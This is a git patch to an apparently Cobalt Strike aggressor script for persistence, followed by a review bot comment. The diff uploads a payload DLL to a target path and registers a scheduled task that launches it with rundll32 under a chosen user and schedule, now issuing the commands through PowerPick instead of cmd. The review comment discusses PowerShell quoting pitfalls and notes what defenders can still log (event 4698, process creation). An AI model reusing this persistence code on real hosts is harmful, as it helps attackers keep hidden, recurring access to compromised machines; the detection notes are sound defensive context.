From fa91c50aa37687498033fc15921cee7c35244624 Mon Sep 17 00:00:00 2001
From: Harley Lebeau
Date: Fri, 9 Feb 2018 12:46:57 -0700
Subject: [PATCH] Updated with PowerPick
---
 Persistence/UserSchtasksPersist.cna | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/Persistence/UserSchtasksPersist.cna b/Persistence/UserSchtasksPersist.cna
index f5fa481..418883b 100644
--- a/Persistence/UserSchtasksPersist.cna
+++ b/Persistence/UserSchtasksPersist.cna
@@ -14,8 +14,8 @@ sub persistUserSchtasks {
 else {
 bcd($bid, $3['targetpath']);
 bupload($bid, $3['payloadfile']);
- bshell($bid, 'schtasks /create /tn "'.$3['taskname'].'" /tr "C:\Windows\System32\rundll32.exe '.$3['targetpath']."\\".split("/",$3['payloadfile'])[-1].',StartW" /ru "'.$3['user'].'" /sc "'.$3['schedule'].'"');
- bshell($bid, 'schtasks /query /v /tn "'.$3['taskname'].'" /FO list');
+ bpowerpick($bid, 'schtasks /create /tn "'.$3['taskname'].'" /tr "C:\Windows\System32\rundll32.exe '.$3['targetpath']."\\".split("/",$3['payloadfile'])[-1].',StartW" /ru "'.$3['user'].'" /sc "'.$3['schedule'].'"');
+ bpowerpick($bid, 'schtasks /query /v /tn "'.$3['taskname'].'" /FO list');
 }
 }));
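Review bot: The command strings passed to `bpowerpick` were written for cmd.exe and are now parsed by PowerShell, and neither the code nor the commit message records that or what it changes. Inside the double-quoted `/tn`, `/tr`, `/ru` and `/sc` arguments PowerShell expands `$` and treats the backtick as an escape, so dialog values containing either may not reach schtasks verbatim; the hunk shows no check on those fields, though the `if` that this `else` belongs to lies outside it. I would add a comment above the first call such as `# parsed by PowerShell (bpowerpick), not cmd.exe; schtasks.exe is still launched as a child process`, and note for the engagement record that the uploaded file and the task named in `taskname` stay on the host until removed. For defenders the swap changes little: where process-creation logging is enabled the schtasks.exe command line with `rundll32.exe ...,StartW` in `/tr` is still recorded, and the task registration itself is still logged by Task Scheduler auditing (event 4698 where that audit policy is on).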